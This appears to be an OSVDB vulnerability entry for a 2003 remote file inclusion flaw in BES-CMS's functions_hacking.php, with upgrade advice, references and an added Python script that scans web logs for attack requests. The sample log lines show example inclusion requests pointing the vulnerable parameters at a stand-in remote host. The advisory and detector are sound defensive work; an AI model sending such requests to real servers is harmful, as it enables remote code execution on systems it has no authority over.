BES-CMS hacking.php Arbitrary Code Execution

2003-12-22T07:35:44
ID OSVDB:3421
Type osvdb
Reporter OSVDB
Modified 2003-12-22T07:35:44

Description

Vulnerability Description

BES-CMS contains a flaw that allows a malicious user to force a script to include arbitrary PHP code. The flaw exists because the application does not validate the "$inc_path" and "$PATH_Includes" variables when they are submitted to the Include/functions_hacking.php script. A user can create a specially crafted URL that specifies a malicious file on a remote system, allowing the attacker to execute code on the vulnerable system and leading to a loss of integrity.

Solution Description

Upgrade to version 0.5 rc4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
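
For hosts that have not yet been confirmed as upgraded, web server access logs can be checked for requests that set either variable to a remote location. The following is an added example, not part of the OSVDB entry or of BES-CMS; it assumes combined-format access logs and that the variables arrive in the query string (values sent in a POST body or cookie do not appear in access logs), and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script name and parameter names are taken from the advisory text.
SCRIPT = "functions_hacking.php"
PARAMS = {"inc_path", "PATH_Includes"}
# A value naming a remote resource: scheme://... or protocol-relative //host
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return the advisory's parameters that carry a remote location, or []."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/" + SCRIPT):
        return []
    hits = []
    # parse_qsl percent-decodes values, so encoded schemes are caught too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in PARAMS and REMOTE.match(value):
            hits.append(name)
    return hits

def scan(lines):
    """Yield (line_number, client_ip, params) for each matching log line."""
    for n, line in enumerate(lines, 1):
        hits = suspicious_params(line)
        if hits:
            yield n, line.split(" ", 1)[0], hits

# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE = [
    '192.0.2.10 - - [22/Dec/2003:07:40:01 +0000] "GET /index.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [22/Dec/2003:07:41:13 +0000] "GET /Include/functions_hacking.php?inc_path=http://host.example/ HTTP/1.0" 200 312',
    '198.51.100.7 - - [22/Dec/2003:07:41:20 +0000] "GET /Include/functions_hacking.php?PATH_Includes=ftp%3A%2F%2Fhost.example%2F HTTP/1.0" 200 298',
    '192.0.2.10 - - [22/Dec/2003:07:42:02 +0000] "GET /Include/functions_hacking.php?inc_path=../Include/ HTTP/1.0" 200 44',
]

if __name__ == "__main__":
    for n, ip, params in scan(SAMPLE):
        print(f"line {n}: {ip} set {', '.join(params)} to a remote location")
```

A match only shows that a request was made; whether the include succeeded depends on the installed version and the PHP configuration of the host.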

References:

Vendor Specific Solution URL: http://bes.h6p.org/download/
Secunia Advisory ID: 10477
Related OSVDB ID: 3418
Related OSVDB ID: 3419
Related OSVDB ID: 3140
Related OSVDB ID: 3406
Related OSVDB ID: 3420
Other Solution URL: http://www.phpsecure.info/v2/.php
Other Advisory URL: http://www.security-corporation.com/advisories-024.html
Other Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2003-12/0299.html
Other Advisory URL: http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0071.html
Keyword: File Inclusion
ISS X-Force ID: 14043
Bugtraq ID: 9268